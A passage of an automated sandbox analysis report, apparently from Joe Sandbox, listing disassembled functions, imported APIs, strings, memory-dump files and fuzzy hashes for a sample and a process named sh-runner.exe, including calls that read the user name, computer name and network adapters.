Instruction Fuzzy Hash: B7418372A14B068BE350DF69C0807EDB7E1EB94B65F75C235D70C472C8DA38E8558B24

Non-executed Functions

Function 00007FF71C8C52E0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 1390COMMON

Download Yara Rule

Strings

NaN, xrefs: 00007FF71C8C558F
, xrefs: 00007FF71C8C6785
, xrefs: 00007FF71C8C6A17
Infinity, xrefs: 00007FF71C8C5610

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: 4abaa2ad451354b0e1059ba36ecd3988c05ea4d0e4efb7f34230c85d63f40b8e
Instruction ID: d2f145c732b98a5fb615ca3391430b610f2419331b807c88e44361e4c2824139
Opcode Fuzzy Hash: 4abaa2ad451354b0e1059ba36ecd3988c05ea4d0e4efb7f34230c85d63f40b8e
Instruction Fuzzy Hash: 39D2E932A2CB818BE7119F65E0807EAF7A0FB857A4F644135EA4A43B45DB3DF4548F24

Function 00007FF71C8C1D70 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF71C8C20B4
Unknown pseudo relocation protocol version %d., xrefs: 00007FF71C8C20C0
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF71C8C1EFD

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: a48de7ea04901e760bad9afab67e89c840719b3d909c55dff15317a19347d95a
Instruction ID: 34d2923f28fe6d0e73f13db36a565b6ac98db7f934ceae58f3444ac5b03141e1
Opcode Fuzzy Hash: a48de7ea04901e760bad9afab67e89c840719b3d909c55dff15317a19347d95a
Instruction Fuzzy Hash: 74919422E29B5246EB107BD594C02F9E261BF557B4FA48231DD5C177D4DF3CE82A8228

Function 00007FF71C8C2116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

signal.MSVCRT ref: 00007FF71C8C21D2

Strings

CCG , xrefs: 00007FF71C8C2135

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: e17495df2833413120c66832d229048d27d7095b12996ca080349749cd9857c4
Instruction ID: ce83422d68a77a6147a5fd6efdf50cab4099d22372eb974b84f350f885b984d4
Opcode Fuzzy Hash: e17495df2833413120c66832d229048d27d7095b12996ca080349749cd9857c4
Instruction Fuzzy Hash: 1D215A21E28B0646FB6872E544D13F9D1819F89330FB98537CA2D823D5CD1CB8A95139

Function 00007FF71C8C40E0 Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

., xrefs: 00007FF71C8C4240

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: b1cc8295f4589949e1a95339fcec62e27a85a0d60d03e1e284163e2cea26f545
Instruction ID: a9c50b178c44dc5311e510660a9b705fb996f51469d13b100efa655b8598e5a8
Opcode Fuzzy Hash: b1cc8295f4589949e1a95339fcec62e27a85a0d60d03e1e284163e2cea26f545
Instruction Fuzzy Hash: EAB13F22A3CB4242F7296DA9D0947F9E151FBD0BA4FA48135DE0E477C4DE3CE9988324

Function 00007FF71C8CE2C8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21bc25e796c4aa4f1df9bc1f021895828adaecb062952485d3021ffe85e8d9a9
Instruction ID: 86451c1b0db450560f8ab254e2bdc3a15f3fb552475a10579dfac18c38d6bc53
Opcode Fuzzy Hash: 21bc25e796c4aa4f1df9bc1f021895828adaecb062952485d3021ffe85e8d9a9
Instruction Fuzzy Hash: 7231358BE2DFD149F35265B40CBA1E45FD16BA2A3279D407ECE58077C3A8097C29D325

Function 00007FF71C8C8011 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 000e85264ce1ab80e9869d57bb3dc2b393154ec0b34ef4b7406e5cbef96d339c
Instruction ID: 6a277cb6a10f76c320bb3dec369f06050e6c0770bf56a4503a92678dc59f1cd6
Opcode Fuzzy Hash: 000e85264ce1ab80e9869d57bb3dc2b393154ec0b34ef4b7406e5cbef96d339c
Instruction Fuzzy Hash: 48A0021285DD01C0F3041B40E8412F4A22AD70A314F947134D018511A18A2DA4648118

Function 00007FF71C8C1B90 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 00007FF71C8C1CAB

Strings

Mingw-w64 runtime failure:, xrefs: 00007FF71C8C1BC7
VirtualProtect failed with code 0x%x, xrefs: 00007FF71C8C1D1E
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF71C8C1D41
Address %p has no image-section, xrefs: 00007FF71C8C1C02, 00007FF71C8C1D55

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 40c8c994400402f600e035479c1fb89154e4aeef581b152615233888ed21daec
Instruction ID: a93ff1abfe2da7ffcb66bafe5b92d365fa49891134ef105640bc9fd8dce86ccb
Opcode Fuzzy Hash: 40c8c994400402f600e035479c1fb89154e4aeef581b152615233888ed21daec
Instruction Fuzzy Hash: EC51A332A24F4685EB10BB91E8C06E9E760FB45BA0FE44135EE4C07394DE3CE46AC758

Function 00007FF71C8C2F00 Relevance: 7.8, APIs: 5, Instructions: 340
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF71C8C2FD5
fputc.MSVCRT ref: 00007FF71C8C3172

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: fputcmemset
String ID:
API String ID: 947785774-0
Opcode ID: e35b00e59b905684b8b3c37ce7968cc8b79af77354999ac318f975d91bfacad4
Instruction ID: e8ff2153b9cc1b2cca1b6c0bbe6835fa772361f9eb88024411d452408ca5ccde
Opcode Fuzzy Hash: e35b00e59b905684b8b3c37ce7968cc8b79af77354999ac318f975d91bfacad4
Instruction Fuzzy Hash: 56D10D73B38B418AE7249E7494803FDA691AB04F78FB44235D91D577C4CA3CEA1A8314

Function 00007FF71C8C3430 Relevance: 6.2, APIs: 4, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5302ff083d334d4ec2b6ee15df48bd3afbd47665d38e4d7ad72ba528e251c5f1
Instruction ID: 83bf8be388a9d0d40c335f62a4d98974130bb926393a3f9fc7938d2d6a9ff0ab
Opcode Fuzzy Hash: 5302ff083d334d4ec2b6ee15df48bd3afbd47665d38e4d7ad72ba528e251c5f1
Instruction Fuzzy Hash: C091EC72F28B5246E765AF68C0847F9A791AB04F78FA58130CE0C573C4DB3CE95A8758

Function 00007FF71C8C7BA0 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF71C8C7BFA
MultiByteToWideChar.KERNEL32 ref: 00007FF71C8C7C3A

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 83dc216bc8520d6005350d0ddcc0ea1a73efd802d55844d36b42c007fdf00b9f
Instruction ID: efefd6572277d96851e3c8ab6cceeb0c085c1806288553023dc799a24f10f074
Opcode Fuzzy Hash: 83dc216bc8520d6005350d0ddcc0ea1a73efd802d55844d36b42c007fdf00b9f
Instruction Fuzzy Hash: D6310872A1CB8286E360AF65F4803E9B6D0FB907A4FA58134EA88477D4DF3DD458CB14

Function 00007FF71C8C1A80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF71C8C1B00

Strings

Unknown error, xrefs: 00007FF71C8C1B6C
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF71C8C1AE7

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 9b38af0ae7b6fe8fe4a5611bfa1e76cb0f86a688c51365a936f5bc3da82805a1
Instruction ID: fb6d050b2998dadda11c7a3fb068f4c134c08aa4c101b3da508e5dcfa526cc61
Opcode Fuzzy Hash: 9b38af0ae7b6fe8fe4a5611bfa1e76cb0f86a688c51365a936f5bc3da82805a1
Instruction Fuzzy Hash: F101A022D1CF8482D3019F5898801FAB320FB6E758F659325EA8C26165DF28E596C704

Function 00007FF71C8C1B30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF71C8C1B00

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF71C8C1AE7
Partial loss of significance (PLOSS), xrefs: 00007FF71C8C1B30

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 3a7e04ff68ff461bc54adae239256ee8d9e7739382e5f891c1b00758f4c8fb52
Instruction ID: d33b08119ec19bc95a6101f6eea03f22363b9c0b5f1e1c699fb1fc635c5852b3
Opcode Fuzzy Hash: 3a7e04ff68ff461bc54adae239256ee8d9e7739382e5f891c1b00758f4c8fb52
Instruction Fuzzy Hash: 3AF04F1291CF8882D302AF5CA4400EAB320FB4D798F689325EF8D26155DF28E5968714

Function 00007FF71C8C1B20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF71C8C1B00

Strings

Argument domain error (DOMAIN), xrefs: 00007FF71C8C1B20
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF71C8C1AE7

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: db3ac677f1f2c54c2345fb678ade51eb76862a0d2707d25709ee7c64068b4dc1
Instruction ID: 4df37e763f5ef1770b9644d43733a87b8031343e9af31978ebcee6bde73f59f2
Opcode Fuzzy Hash: db3ac677f1f2c54c2345fb678ade51eb76862a0d2707d25709ee7c64068b4dc1
Instruction Fuzzy Hash: FCF06212D1CF8882D302AF5CA4400EBB330FF4DB98F685325EF8D26155DF28E5968714

Function 00007FF71C8C1B50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF71C8C1B00

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF71C8C1B50
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF71C8C1AE7

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 0dced1c727ef90fbbd92c9dce7bdcc55e6a2092160eaf33fabd7ff2435923f73
Instruction ID: d05036d45a01c569894649f3e17b41c17b6094d1ca3377eb1e5035063147be34
Opcode Fuzzy Hash: 0dced1c727ef90fbbd92c9dce7bdcc55e6a2092160eaf33fabd7ff2435923f73
Instruction Fuzzy Hash: B2F06222D1CF8882D302AF5CA4400EBB330FF4D798F685325EF8D26155DF28E5968714

Function 00007FF71C8C1B40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF71C8C1B00

Strings

Overflow range error (OVERFLOW), xrefs: 00007FF71C8C1B40
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF71C8C1AE7

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: a06668e6d3fce080e45a48d8ec67e54a60e55eea52cb01d9b7bef504bb2c86f2
Instruction ID: fd041e01061b4783ae42af1dc09d53b7706763644dec198bd28bc742e6870f81
Opcode Fuzzy Hash: a06668e6d3fce080e45a48d8ec67e54a60e55eea52cb01d9b7bef504bb2c86f2
Instruction Fuzzy Hash: 58F04F1291CF8882D302AF5CA4400EAB320FB5D798F685325EF8D26555DF28E5968714

Function 00007FF71C8C1B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF71C8C1B00

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF71C8C1AE7
Total loss of significance (TLOSS), xrefs: 00007FF71C8C1B60

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: b773b55875b88ab2c3d8e57f9be057c5620b53852a9d17090990b4a6717721ec
Instruction ID: 13415a5a6bfb23c6c34231dc1c546e310b5ee36d66927afcb97aced552b1c59e
Opcode Fuzzy Hash: b773b55875b88ab2c3d8e57f9be057c5620b53852a9d17090990b4a6717721ec
Instruction Fuzzy Hash: 90F06212D1CF8882D302AF5CA4400EBB330FF4D798F689325EF8D26555DF29E5968714

Function 00007FF71C8C1AB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF71C8C1B00

Strings

Argument singularity (SIGN), xrefs: 00007FF71C8C1AB8
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF71C8C1AE7

Memory Dump Source

Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true

Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 43ab06d8bb0e13efae59bfc5cb7a6822e2696801d94299209a41bb19ce347428
Instruction ID: 1963dd204765d7c10fbeeb94ddb7b229a05da97f9fb9fbe49a2c87522fb9b163
Opcode Fuzzy Hash: 43ab06d8bb0e13efae59bfc5cb7a6822e2696801d94299209a41bb19ce347428
Instruction Fuzzy Hash: E3F09616C18F8882D302AF5CA4400EBB330FF5D798F645325EF8C2A155DF29E596C714

Analysis Process: sh-runner.exePID: 3096, Parent PID: 7128COMMON

Execution Graph

Execution Coverage:	0.8%
Dynamic/Decrypted Code Coverage:	45.2%
Signature Coverage:	17.7%
Total number of Nodes:	186
Total number of Limit Nodes:	14

Executed Functions

Function 000001FF24F97D70 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 000001FF24F97F66
GetComputerNameExA.KERNEL32 ref: 000001FF24F9800C
GetComputerNameExA.KERNEL32 ref: 000001FF24F98051
GetAdaptersInfo.IPHLPAPI ref: 000001FF24F980B2
GetAdaptersInfo.IPHLPAPI ref: 000001FF24F980E7

Strings

, xrefs: 000001FF24F97E33

Memory Dump Source

Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd

Similarity

API ID: Name$AdaptersComputerInfo$User
String ID:
API String ID: 1713523329-3916222277
Opcode ID: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
Instruction ID: 88daa098e3c5a22d12c06e9e94bed804bb46855b5a07cbab95a570dc2a821c16
Opcode Fuzzy Hash: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
Instruction Fuzzy Hash: 72F10E30324A498FEB84EB18C495BA673E1FF9C304F544578E589C729ADEB4E946CB42

Function 00007FF72BCD1180 Relevance: 10.6, APIs: 7, Instructions: 146
sleepstringCOMMON

